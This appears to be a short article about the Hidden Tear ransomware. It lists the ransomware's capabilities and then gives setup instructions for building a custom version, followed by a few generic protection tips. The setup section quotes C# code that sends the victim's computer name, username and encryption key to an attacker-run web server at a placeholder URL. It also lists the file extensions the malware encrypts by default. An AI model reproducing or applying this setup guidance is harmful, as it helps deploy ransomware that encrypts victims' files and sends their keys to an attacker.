Hidden Tear Ransomware is capable of:

-Using AES algorithm to encrypt files
-Sending encryption key to a server
-Encrypting files and decrypting them using a decrypter program with the encryption key
-Creating a text file in Desktop with given message
-Small file size (12 KB)
-Evading detection by all standard anti-virus programs


How to Setup your Custom Ransomware Using Hidden Tear?

Sen has specified usage details as well, he says:

1. You need to have a web server that supports scripting languages such as PHP or Python.

Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):

string targetURL = "https://www.example.com/hidden-tear/write.php?info=";

2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:

string info = computerName + "-" + userName + " " + password;

-var fullUrl = targetURL + info;
-var conent = new System.Net.WebClient().DownloadString(fullUrl);

3. Target file extensions can also be change. Default list:

var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

How to Protect Yourself from Ransomware Threat?

There are some important steps that should be considered to protect yourself from Ransomware threats.

-Always keep regular backups of your important data.
-Make sure you run an active anti-virus security suite of tools on your system.
-Do not open email attachments from unknown sources.
-Most importantly, always browse the Internet safely.